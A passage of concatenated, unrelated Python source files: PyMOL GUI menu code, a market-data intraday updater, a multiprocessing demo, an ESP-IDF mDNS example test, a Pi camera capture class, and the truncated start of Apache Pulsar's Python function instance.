self.menuBar.addmenuitem('Shadows', 'command', 'Black',
label='Black',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('black')"))
self.menuBar.addmenuitem('Shadows', 'separator', '')
self.menuBar.addmenuitem('Shadows', 'command', 'Matte',
label='Matte',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('matte')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Soft',
label='Soft',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('soft')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Occlusion',
label='Occlusion',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('occlusion')"))
self.menuBar.addmenuitem('Shadows', 'command', 'Occlusion 2',
label='Occlusion 2',
command = lambda s=self: s.cmd.do("_ util.ray_shadows('occlusion2')"))
self.menuBar.addcascademenu('Rendering', 'Texture', 'Texture',
label='Texture')
for label, val in [
('None', 0),
('Matte 1', 1),
('Matte 2', 4),
('Swirl 1', 2),
('Swirl 2', 3),
('Fiber', 5),
]:
addmenuitem('Texture', 'radiobutton', label=label, value=val,
variable=self.setting.ray_texture)
self.menuBar.addcascademenu('Rendering', 'Interior Texture', 'Interior Texture',
label='Interior Texture')
for label, val in [
('Default', -1),
('None', 0),
('Matte 1', 1),
('Matte 2', 4),
('Swirl 1', 2),
('Swirl 2', 3),
('Fiber', 5),
]:
addmenuitem('Interior Texture', 'radiobutton', label=label, value=val,
variable=self.setting.ray_interior_texture)
self.menuBar.addcascademenu('Rendering', 'Memory', 'Memory',
label='Memory')
for label, val in [
('Use Less (slower)', 70),
('Use Standard Amount', 100),
('Use More (faster)', 170),
('Use Even More', 230),
('Use Most', 300),
]:
addmenuitem('Memory', 'radiobutton', label=label, value=val,
variable=self.setting.hash_max)
self.menuBar.addmenuitem('Rendering', 'separator', '')
self.menuBar.addmenuitem('Rendering', 'checkbutton',
'Cull Backfaces when Rendering',
label='Cull Backfaces',
variable = self.setting.backface_cull,
)
self.menuBar.addmenuitem('Rendering', 'checkbutton',
'Opaque Interior Colors',
label='Opaque Interiors',
variable = self.setting.ray_interior_color,
onvalue=74, offvalue=-1,
)
self.menuBar.addmenuitem('Setting', 'separator', '')
self.menuBar.addmenuitem('Setting', 'command', label='GUI Font Size (Dialog)',
command=self.inc_fontsize_dialog)
self.menuBar.addcascademenu('Setting', 'Control', 'Control Size',
label='Control Size')
for val in [12, 14, 16, 18, 20, 24, 30]:
addmenuitem('Control', 'radiobutton', label=str(val), value=val,
variable=self.setting.internal_gui_control_size)
self.menuBar.addmenuitem('Setting', 'separator', '')
addcascademenu('Setting', 'PDBLoading', label='PDB File Loading')
addmenuitem('PDBLoading', 'checkbutton',
'Ignore PDB segi.',
label='Ignore PDB Segment Identifier',
variable = self.setting.ignore_pdb_segi,
)
addcascademenu('Setting', 'CIFLoading', label='mmCIF File Loading')
addmenuitem('CIFLoading', 'checkbutton', label='Use "auth" Identifiers',
variable = self.setting.cif_use_auth)
addmenuitem('CIFLoading', 'checkbutton', label='Load Assembly (Biological Unit)',
variable = self.setting.assembly, onvalue="1", offvalue="")
addmenuitem('CIFLoading', 'checkbutton', label='Bonding by "Chemical Component Dictionary"',
variable = self.setting.connect_mode, onvalue=4)
addcascademenu('Setting', 'MapLoading', label='Map File Loading')
addmenuitem('MapLoading', 'checkbutton', label='Normalize CCP4 Maps',
variable = self.setting.normalize_ccp4_maps)
addmenuitem('MapLoading', 'checkbutton', label='Normalize O Maps',
variable = self.setting.normalize_o_maps)
addmenuitem('Setting', 'separator', '')
addcascademenu('Setting', 'AutoShow', label='Auto-Show ...', tearoff=TRUE)
addmenuitem('AutoShow', 'checkbutton',
label='Cartoon/Sticks/Spheres by Classification',
variable=self.setting.auto_show_classified)
addmenuitem('AutoShow', 'separator', '')
addmenuitem('AutoShow', 'checkbutton', label='Auto-Show Lines', variable=self.setting.auto_show_lines)
addmenuitem('AutoShow', 'checkbutton', label='Auto-Show Spheres', variable=self.setting.auto_show_spheres)
addmenuitem('AutoShow', 'checkbutton', label='Auto-Show Nonbonded', variable=self.setting.auto_show_nonbonded)
addmenuitem('AutoShow', 'separator', '')
addmenuitem('AutoShow', 'checkbutton',
'Auto-Show Selections.',
label='Auto-Show New Selections',
variable = self.setting.auto_show_selections,
)
addmenuitem('AutoShow', 'checkbutton',
'Auto-Hide Selections.',
label='Auto-Hide Selections',
variable = self.setting.auto_hide_selections,
)
self.menuBar.addmenuitem('Setting', 'checkbutton',
'Auto-Zoom.',
label='Auto-Zoom New Objects',
variable = self.setting.auto_zoom,
)
self.menuBar.addmenuitem('Setting', 'checkbutton',
'Auto-Remove Hydrogens.',
label='Auto-Remove Hydrogens',
variable = self.setting.auto_remove_hydrogens,
)
self.menuBar.addmenuitem('Setting', 'separator', '')
addmenuitem('Setting', 'checkbutton', label='Show Text / Hide Graphics [Esc]',
variable = self.setting.text)
self.menuBar.addmenuitem('Setting', 'checkbutton',
'Overlay Text Output on Graphics',
label='Overlay Text',
variable = self.setting.overlay,
)
self.menuBar.addmenu('Scene', 'Scene Storage',tearoff=TRUE)
self.menuBar.addmenuitem('Scene', 'command', 'Next',
label='Next [PgDn]',
command = lambda s=self: s.cmd.scene('auto','next'))
self.menuBar.addmenuitem('Scene', 'command', 'Previous',
label='Previous [PgUp]',
command = lambda s=self: s.cmd.scene('auto','previous'))
self.menuBar.addmenuitem('Scene', 'separator', '')
self.menuBar.addmenuitem('Scene', 'command', 'Append',
label='Append',
command = lambda s=self: s.cmd.scene('new','store'))
self.menuBar.addcascademenu('Scene', 'SceneAppend', label='Append...')
addmenuitem('SceneAppend', 'command', label='Camera',
command = lambda: self.cmd.scene('new', 'store', view=1, color=0, rep=0))
addmenuitem('SceneAppend', 'command', label='Color',
command = lambda: self.cmd.scene('new', 'store', view=0, color=1, rep=0))
addmenuitem('SceneAppend', 'command', label='Color & Camera',
command = lambda: self.cmd.scene('new', 'store', view=1, color=1, rep=0))
addmenuitem('SceneAppend', 'command', label='Reps',
command = lambda: self.cmd.scene('new', 'store', view=0, color=0, rep=1))
addmenuitem('SceneAppend', 'command', label='Reps & Color',
command = lambda: self.cmd.scene('new', 'store', view=0, color=1, rep=1))
self.menuBar.addmenuitem('Scene', 'command', 'Insert Before',
label='Insert (before)',
command = lambda s=self: s.cmd.scene('','insert_before'))
self.menuBar.addmenuitem('Scene', 'command', 'Insert After',
label='Insert (after)',
command = lambda s=self: s.cmd.scene('','insert_after'))
self.menuBar.addmenuitem('Scene', 'command', 'Update',
label='Update',
command = lambda s=self: s.cmd.scene('auto','update'))
# self.menuBar.addmenuitem('Scene', 'command', 'Annotate',
# label='Append',
# command = lambda s=self: s.cmd.scene('new','store'))
self.menuBar.addmenuitem('Scene', 'separator', '')
self.menuBar.addmenuitem('Scene', 'command', 'Delete',
label='Delete',
command = lambda s=self: s.cmd.scene('auto','clear'))
self.menuBar.addmenuitem('Scene', 'separator', '')
self.menuBar.addcascademenu('Scene', 'Recall', 'Recall',
label='Recall')
self.menuBar.addcascademenu('Scene', 'Store', 'Store',
label='Store')
# self.menuBar.addcascademenu('Store', 'StoreSHFT', 'StoreSHFT',
# label='Shift')
self.menuBar.addcascademenu('Scene', 'Clear', 'Clear',
label='Clear')
# self.menuBar.addcascademenu('Scene', 'SceneSHFT', 'SceneSHFT',
# label='Shift')
for x in range(1,13):
self.menuBar.addmenuitem('Store', 'checkbutton', 'F%d'%x,
label='F%d'%x,
variable = self.scene_F_keys[x - 1],
command = lambda x=x,s=self: s.cmd.do("scene F%d,store"%x))
# self.menuBar.addmenuitem('ClearSHFT', 'checkbutton', 'SHFT-F%d'%x,
# label='SHFT-F%d'%x,
# variable = self.setting.SHFTF[x],
# command = lambda x=x,s=self: s.cmd.do("scene SHFT-F%d,clear"%x))
self.menuBar.addmenuitem('Scene', 'separator', '')
self.menuBar.addmenuitem('Scene', 'checkbutton', 'Buttons',
label='Buttons',
variable = self.setting.scene_buttons,
)
self.menuBar.addcascademenu('Scene', 'Cache', 'Cache',
label='Cache')
self.menuBar.addmenuitem('Cache', 'command', 'Enable',
label='Enable',
command = lambda s=self:
s.cmd.do("_ cache enable"))
self.menuBar.addmenuitem('Cache', 'command', 'Optimize',
label='Optimize',
command = lambda s=self:
s.cmd.do("_ cache optimize"))
self.menuBar.addmenuitem('Cache', 'command', 'Read Only',
label='Read Only',
command = lambda s=self:
s.cmd.do("_ cache read_only"))
self.menuBar.addmenuitem('Cache', 'command', 'Disable',
label='Disable',
command = lambda s=self:
s.cmd.do("_ cache disable"))
self.menuBar.addmenu('Mouse', 'Mouse Configuration',tearoff=TRUE)
self.menuBar.addcascademenu('Mouse', 'SelectionMode', 'Selection Mode',
label='Selection Mode')
var = self.setting.mouse_selection_mode
for lab, val in [
('Atoms', 0),
('Residues', 1),
('Chains', 2),
('Segments', 3),
('Objects', 4),
('', -1),
('Molecules', 5),
('', -1),
('C-alphas', 6),
]:
if not lab:
addmenuitem('SelectionMode', 'separator', '')
else:
addmenuitem('SelectionMode', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addmenuitem('Mouse', 'command', '3 Button Motions',
label='3 Button Motions',
command = lambda s=self: s.cmd.config_mouse('three_button_motions'))
self.menuBar.addmenuitem('Mouse', 'command', '3 Button Editing',
label='3 Button Editing',
command = lambda s=self: s.cmd.config_mouse('three_button_editing'))
self.menuBar.addmenuitem('Mouse', 'command', '3 Button Viewing',
label='3 Button Viewing',
command = lambda s=self: s.cmd.mouse('three_button_viewing'))
self.menuBar.addmenuitem('Mouse', 'command', '3 Button Lights',
label='3 Button Lights',
command = lambda s=self: s.cmd.mouse('three_button_lights'))
self.menuBar.addmenuitem('Mouse', 'command', '3 Button All Modes',
label='3 Button All Modes',
command = lambda s=self: s.cmd.config_mouse('three_button_all_modes'))
self.menuBar.addmenuitem('Mouse', 'command', '2 Button Editing',
label='2 Button Editing',
command = lambda s=self: s.cmd.config_mouse('two_button_editing'))
self.menuBar.addmenuitem('Mouse', 'command', '2 Button Viewing',
label='2 Button Viewing',
command = lambda s=self: s.cmd.config_mouse('two_button'))
self.menuBar.addmenuitem('Mouse', 'command', '1 Button Viewing Mode',
label='1 Button Viewing Mode',
command = lambda s=self: s.cmd.mouse('one_button_viewing'))
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addcascademenu('Mouse', 'Emulate', 'Emulate',
label='Emulate')
self.menuBar.addmenuitem('Emulate', 'command', 'Maestro',
label='Maestro',
command = lambda s=self: s.cmd.mouse('three_button_maestro'))
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addmenuitem('Mouse', 'checkbutton',
'Virtual Trackball.',
label='Virtual Trackball',
variable = self.setting.virtual_trackball,
)
self.menuBar.addmenuitem('Mouse', 'checkbutton',
'Show Mouse Grid.',
label='Show Mouse Grid',
variable = self.setting.mouse_grid,
)
self.menuBar.addmenuitem('Mouse', 'checkbutton',
'Roving Origin.',
label='Roving Origin',
variable = self.setting.roving_origin,
)
# self.menuBar.addmenuitem('Mouse', 'checkbutton',
# 'Roving Detail.',
# label='Roving Detail',
# variable = self.setting.roving_detail,
# )
if sys.platform == 'darwin':
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addcascademenu('Mouse', 'MacX11Focus', 'Mac OS X11',
label='Mac OS X11')
self.menuBar.addmenuitem('MacX11Focus', 'command',
'Enable Click Through',
label='Enable Click Through',
command = lambda s=self:
s.toggleClickThrough(1))
self.menuBar.addmenuitem('MacX11Focus', 'command',
'Disable Click Through',
label='Disable Click Through',
command = lambda s=self:
s.toggleClickThrough(0))
self.menuBar.addmenu('Wizard', 'Task Wizards',tearoff=TRUE)
self.menuBar.addmenuitem('Wizard', 'command', 'Appearance',
label='Appearance',
command = lambda s=self: s.cmd.do("_ wizard appearance"))
self.menuBar.addmenuitem('Wizard', 'command', 'Measurement',
label='Measurement',
command = lambda s=self: s.cmd.do("_ wizard measurement"))
self.menuBar.addmenuitem('Wizard', 'command', 'Mutagenesis',
label='Mutagenesis',
command = lambda s=self: s.cmd.do("_ wizard mutagenesis"))
self.menuBar.addmenuitem('Wizard', 'command', 'Pair Fitting',
label='Pair Fitting',
command = lambda s=self: s.cmd.do("_ wizard pair_fit"))
self.menuBar.addmenuitem('Wizard', 'separator', '')
self.menuBar.addmenuitem('Wizard', 'command', 'Density Map Wizard',
label='Density',
command = lambda s=self: s.cmd.do("_ wizard density"))
self.menuBar.addmenuitem('Wizard', 'command', 'Filter',
label='Filter',
command = lambda s=self: s.cmd.do("_ wizard filter"))
self.menuBar.addmenuitem('Wizard', 'command', 'Sculpting',
label='Sculpting',
command = lambda s=self: s.cmd.do("_ wizard sculpting"))
if cleanup.auto_configure()>0:
self.menuBar.addmenuitem('Wizard', 'separator', '')
self.menuBar.addmenuitem('Wizard', 'command', 'Cleanup',
label='Cleanup',
command = lambda s=self: s.cmd.do("_ wizard cleanup"))
self.menuBar.addmenuitem('Wizard', 'separator', '')
self.menuBar.addmenuitem('Wizard', 'command', 'Label',
label='Label',
command = lambda s=self: s.cmd.do("_ wizard label"))
self.menuBar.addmenuitem('Wizard', 'command', 'Charge',
label='Charge',
command = lambda s=self: s.cmd.do("_ wizard charge"))
self.menuBar.addmenuitem('Wizard', 'separator', '')
self.menuBar.addcascademenu('Wizard', 'Demo', 'Demo',
label='Demo',tearoff=TRUE)
self.menuBar.addmenuitem('Demo', 'command', 'Representations',
label='Representations',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,reps"))
self.menuBar.addmenuitem('Demo', 'command', 'Cartoon Ribbons',
label='Cartoon Ribbons',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,cartoon"))
self.menuBar.addmenuitem('Demo', 'command', 'Roving Detail',
label='Roving Detail',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,roving"))
self.menuBar.addmenuitem('Demo', 'command', 'Roving Density',
label='Roving Density',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,roving_density"))
self.menuBar.addmenuitem('Demo', 'command', 'Transparency',
label='Transparency',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,trans"))
self.menuBar.addmenuitem('Demo', 'command', 'Ray Tracing',
label='Ray Tracing',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,ray"))
self.menuBar.addmenuitem('Demo', 'command', 'Sculpting',
label='Sculpting',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,sculpt"))
self.menuBar.addmenuitem('Demo', 'command', 'Scripted Animation',
label='Scripted Animation',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,anime"))
self.menuBar.addmenuitem('Demo', 'command', 'Electrostatics',
label='Electrostatics',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,elec"))
self.menuBar.addmenuitem('Demo', 'command', 'Compiled Graphics Objects',
label='Compiled Graphics Objects',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,cgo"))
self.menuBar.addmenuitem('Demo', 'command', 'MolScript/Raster3D Input',
label='Molscript/Raster3D Input',
command = lambda s=self: s.cmd.do(
"_ replace_wizard demo,raster3d"))
self.menuBar.addmenuitem('Demo', 'separator', '')
self.menuBar.addmenuitem('Demo', 'command', 'End Demonstration',
label='End Demonstration',
command = lambda s=self: s.cmd.do(
'_ replace_wizard demo,finish'))
self.menuBar.addmenu('Plugin', 'Plugin',tearoff=TRUE)
# hook up scene menu updates
index = self.pymol.setting.index_dict.get('scenes_changed')
self.setting.active_dict[index] = self.update_scene_menu
def update_scene_menu(self):
scene_list = self.cmd.get_scene_list()
for action in ['recall', 'clear']:
parent = action.capitalize()
self.menuBar.deletemenuitems(parent, 0, 999)
for k in scene_list:
self.menuBar.addmenuitem(parent, 'command', k, label=k,
command=lambda k=k, a=action: self.cmd.scene(k, a))
for i in range(12):
k = 'F' + str(i + 1)
self.scene_F_keys[i].set(1 if k in scene_list else 0)
def show_about(self):
Pmw.aboutversion(self.appversion)
Pmw.aboutcopyright(self.copyright)
Pmw.aboutcontact(
'For more information, browse to: %s\n or send email to: %s' %\
(self.contactweb, self.contactemail))
self.about = Pmw.AboutDialog(self.root, applicationname=self.appname)
self.my_activate(self.about)
self.about.withdraw()
def createInterface(self):
self.balloon = Pmw.Balloon(self.root)
self.createMenuBar()
self.app.menuBar = self.menuBar # to support legacy plugins
self.app.initializePlugins()
self.createDataArea()
self.createCommandArea()
self.createButtons()
self.createMessageBar()
self.createConsole()
def setup(self):
# call the parent method
PMGSkin.setup(self)
# name the application
self.root.title(self.appname)
# create the user interface
self.createInterface()
# pack the root window
self.app._hull.pack(side=LEFT, fill=BOTH, expand=YES, anchor=CENTER)
# and set focus
if hasattr(self,'entry'): self.entry.focus_set()
def takedown(self):
self.destroyMessageBar()
self.destroyDataArea()
self.destroyCommandArea()
self.destroyButtonArea()
self.balloon.destroy()
self.menuBar.destroy()
def __init__(self,app):
global root
root = app.root
PMGSkin.__init__(self,app)
Normal.appversion = app.pymol.cmd.get_version()[0]
Normal.appversion += " Incentive Product" \
if app.pymol.invocation.options.incentive_product else \
" Open-Source"
self.app = app
self.save_file = ''
self.cmd = app.pymol.cmd
self.util = app.pymol.util
self.movie_command = None
self.movie_start = 1
self.auto_overlay = None
self.edit_mode = None
self.valence = None
self._initialdir = ''
self.fixedfont = tkFont.nametofont('TkFixedFont')
self.scene_F_keys = [IntVar(root) for _ in range(12)]
def __init__(app):
return Normal(app)
|
update_intraday.py
|
import os
import sys
from multiprocessing import Process, Value
sys.path.append('hyperdrive')
from DataSource import IEXCloud, Polygon # noqa autopep8
from Constants import POLY_CRYPTO_SYMBOLS, FEW_DAYS # noqa autopep8
import Constants as C # noqa autopep8
counter = Value('i', 0)
iex = IEXCloud()
poly = Polygon(os.environ['POLYGON'])
stock_symbols = iex.get_symbols()
crypto_symbols = POLY_CRYPTO_SYMBOLS
all_symbols = stock_symbols + crypto_symbols
# Double redundancy
# 1st pass
def update_iex_intraday():
for symbol in stock_symbols:
filenames = []
try:
filenames = iex.save_intraday(
symbol=symbol, timeframe='1d',
retries=1 if C.TEST else C.DEFAULT_RETRIES)
with counter.get_lock():
counter.value += 1
except Exception as e:
print(f'IEX Cloud intraday update failed for {symbol}.')
print(e)
finally:
if C.CI:
for filename in filenames:
if os.path.exists(filename):
os.remove(filename)
# 2nd pass
def update_poly_intraday():
for symbol in all_symbols:
filenames = []
try:
filenames = poly.save_intraday(
symbol=symbol, timeframe=FEW_DAYS, retries=1)
with counter.get_lock():
counter.value += 1
except Exception as e:
print(f'Polygon.io intraday update failed for {symbol}.')
print(e)
finally:
if C.CI:
for filename in filenames:
if os.path.exists(filename):
os.remove(filename)
p1 = Process(target=update_iex_intraday)
p2 = Process(target=update_poly_intraday)
p1.start()
p2.start()
p1.join()
p2.join()
if counter.value / (len(stock_symbols) + len(all_symbols)) < 0.95:
exit(1)
|
process_test.py
|
from multiprocessing import Process
import os
import random
import time
import sys
def child(n):
indent = " " * n
print '{}child{} ({})'.format(indent, n, os.getpid())
for x in range(1, 6):
time.sleep(random.randint(1, 3))
sys.stdout.write('{}child{} ({}) {}\n'.format(indent, n, os.getpid(), x))
sys.stdout.flush()
print '{}child{} *done*'.format(indent, n)
os._exit(0)
def parent():
print "parent pid", os.getpid()
procs = []
for n in range(1, 6):
print "starting child{}".format(n)
p = Process(target=child, args=(n, ))
p.start()
procs.append(p)
# if raw_input() == 'q': break
for p in procs:
p.join()
if __name__ == "__main__":
parent()
|
mdns_example_test.py
|
import re
import os
import socket
import time
import struct
import dpkt
import dpkt.dns
from threading import Thread, Event
import subprocess
from tiny_test_fw import DUT
import ttfw_idf
stop_mdns_server = Event()
esp_answered = Event()
def get_dns_query_for_esp(esp_host):
dns = dpkt.dns.DNS(b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01')
dns.qd[0].name = esp_host + u'.local'
print("Created query for esp host: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns(tester_host):
dns = dpkt.dns.DNS(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
dns. an.append(arr)
print("Created answer to mdns query: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns_lwip(tester_host, id):
dns = dpkt.dns.DNS(b"\x5e\x39\x84\x00\x00\x01\x00\x01\x00\x00\x00\x00\x0a\x64\x61\x76\x69\x64"
b"\x2d\x63\x6f\x6d\x70\x05\x6c\x6f\x63\x61\x6c\x00\x00\x01\x00\x01\xc0\x0c"
b"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x04\xc0\xa8\x0a\x6c")
dns.qd[0].name = tester_host
dns.an[0].name = tester_host
dns.an[0].ip = socket.inet_aton('127.0.0.1')
dns.an[0].rdata = socket.inet_aton('127.0.0.1')
dns.id = id
print("Created answer to mdns (lwip) query: {} ".format(dns.__repr__()))
return dns.pack()
def mdns_server(esp_host):
global esp_answered
UDP_IP = "0.0.0.0"
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
TESTER_NAME = u'tinytester.local'
TESTER_NAME_LWIP = u'tinytester-lwip.local'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(30)
while not stop_mdns_server.is_set():
try:
if not esp_answered.is_set():
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
time.sleep(0.2)
data, addr = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0 and dns.qd[0].type == dpkt.dns.DNS_A:
if dns.qd[0].name == TESTER_NAME:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(TESTER_NAME), (MCAST_GRP,UDP_PORT))
elif dns.qd[0].name == TESTER_NAME_LWIP:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns_lwip(TESTER_NAME_LWIP, dns.id), addr)
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
print("Received answer to esp32-mdns query: {}".format(dns.__repr__()))
esp_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mdns(env, extra_data):
global stop_mdns_server
"""
steps: |
1. join AP + init mdns example
2. get the dut host name (and IP address)
3. check the mdns name is accessible
4. check DUT output if mdns advertized host is resolved
"""
dut1 = env.get_dut("mdns-test", "examples/protocols/mdns", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mdns-test.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mdns-test_bin_size", "{}KB".format(bin_size // 1024))
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r"mdns hostname set to: \[([^\]]+)\]"), timeout=30)
specific_host = str(specific_host[0])
thread1 = Thread(target=mdns_server, args=(specific_host,))
thread1.start()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)[0]
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
stop_mdns_server.set()
thread1.join()
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
try:
# 3. check the mdns name is accessible
if not esp_answered.wait(timeout=30):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
# 4. check DUT output if mdns advertized host is resolved
dut1.expect(re.compile(r"mdns-test: Query A: tinytester.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: gethostbyname: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: getaddrinfo: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
# 5. check the DUT answers to `dig` command
dig_output = subprocess.check_output(['dig', '+short', '-p', '5353', '@224.0.0.251',
'{}.local'.format(specific_host)])
print('Resolving {} using "dig" succeeded with:\n{}'.format(specific_host, dig_output))
if not ip_address.encode('utf-8') in dig_output:
raise ValueError("Test has failed: Incorrectly resolved DUT hostname using dig"
"Output should've contained DUT's IP address:{}".format(ip_address))
finally:
stop_mdns_server.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mdns()
|
cam_processor.py
|
import cv2
import queue
import threading
import time
import numpy as np
#from imutils.video import pivideostream as VideoStream
from imutils.video import VideoStream
#import imutilsx.video.videostream.py
#from lib import
class cam_processor:
def __init__(self,
out_queue,
cap_frame_width = 640,
cap_frame_height = 480,
cap_framerate = 32,
out_queue_full_sleep = .1,
out_queue_max_wait = 0.01,
input_source = ''):
self._out_queue_full_sleep = out_queue_full_sleep
self._out_queue_max_wait = out_queue_max_wait
self._pause_mode = False
self._ready = False
self._error = ''
self._working = False
self._stop_flag = False
self._cap_frame_width = cap_frame_width
self._cap_frame_height = cap_frame_height
self._cap_framerate = cap_framerate
#Get the camera
#vs = VideoStream(usePiCamera=True).start()
#vs.resolution( cap_frame_width, cap_frame_height)
#self._video_stream = vs
#self._video_stream.start()
if input_source == '':
print ('Using Pi Camera')
self._video_stream = VideoStream(usePiCamera=True,
resolution=(self._cap_frame_width, self._cap_frame_height),
framerate = self._cap_framerate).start()
else:
print ('Using Input Source: ', input_source)
self._video_stream = VideoStream(input_source, usePiCamera=False,
resolution=(self._cap_frame_width, self._cap_frame_height),
framerate = self._cap_framerate).start()
time.sleep(2)
self._ready = True
# TODO Create own capture class that doesn't use imutils, but uses picamera
# TODO Then, we could capture at different resolutions via splitter
# See: https://picamera.readthedocs.io/en/release-1.13/recipes2.html
# 4.12. Recording at multiple resolutions
# Another option is circular video record
# and grab a frame and put it on the output queue any time it is empty
# because when the image is analyzed, it is taken off the queue
# this would ensure it's processing the most recent, not the image from
# a few seconds ago
# circular video recording is FAF (fast as f...)
# So this would, perhaps, make the NCS processing thread the bottle neck
#self._video_stream.resolution( cap_frame_width, cap_frame_height)
self._out_queue = out_queue
self._worker_thread = threading.Thread(target=self._do_work, args=())
self._ready = True
def start_processing(self):
self._stop_flag = False
self._worker_thread.start()
def stop_processing(self):
self._stop_flag = True
self._worker_thread.join()
self._worker_thread = None
def _do_work(self):
if (self._video_stream is None):
self._ready = False
self._working = False
self._stop_flag = True
return
print ('Cam processor starting')
frame = self._video_stream.read()
(h, w) = frame.shape[:2]
print('CAPTURING AT ',w, ' by ',h)
while not self._stop_flag:
try:
while (not self._stop_flag):
# TODO Test perormance here with a pass if self._out_queue.full() is true
# Why grab a frame if we can't put it on the stack?
# if (self_out_queue.full()): pass
# other option is to while (not self._out_queue.full()):
frame = self._video_stream.read()
# (h, w) = frame.shape[:2]
# print('h,w ',h,w)
#frame = cv2.resize(frame, (self._cap_frame_width, self._cap_frame_height))
# self._out_queue.put(frame, True, self._out_queue_full_sleep)
self._out_queue.put_nowait(frame)
#print ('frame to queue - length: ', self._out_queue.__len__)
#print ('frame ')
except:
time.sleep(self._out_queue_full_sleep)
pass
|
python_instance.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -*- encoding: utf-8 -*-
"""python_instance.py: Python Instance for running python functions
"""
import base64
import os
import signal
import time
try:
import Queue as queue
except:
import queue
import threading
from functools import partial
from collections import namedtuple
from threading import Timer
import traceback
import sys
import re
import pulsar
import contextimpl
import Function_pb2
import log
import util
import InstanceCommunication_pb2
Log = log.Log
# Equivalent of the InstanceConfig in Java
InstanceConfig = namedtuple('InstanceConfig', 'instance_id function_id function_version function_details max_buffered_tuples')
# This is the message that the consumers put on the queue for the function thread to process
InternalMessage = namedtuple('InternalMessage', 'message topic serde consumer')
InternalQuitMessage = namedtuple('InternalQuitMessage', 'quit')
DEFAULT_SERIALIZER = "serde.IdentitySerDe"
PY3 = sys.version_info[0] >= 3
def base64ify(bytes_or_str):
if PY3 and isinstance(bytes_or_str, str):
input_bytes = bytes_or_str.encode('utf8')
else:
input_bytes = bytes_or_str
output_bytes = base64.urlsafe_b64encode(input_bytes)
if PY3:
return output_bytes.decode('ascii')
else:
return output_bytes
# We keep track of the following metrics
class Stats(object):
def __init__(self):
self.reset()
def reset(self):
self.nprocessed = 0
self.nsuccessfullyprocessed = 0
self.nuserexceptions = 0
self.latestuserexceptions = []
self.nsystemexceptions = 0
self.latestsystemexceptions = []
self.ndeserialization_exceptions = {}
self.nserialization_exceptions = 0
self.latency = 0
self.lastinvocationtime = 0
def increment_deser_errors(self, topic):
if topic not in self.ndeserialization_exceptions:
self.ndeserialization_exceptions[topic] = 0
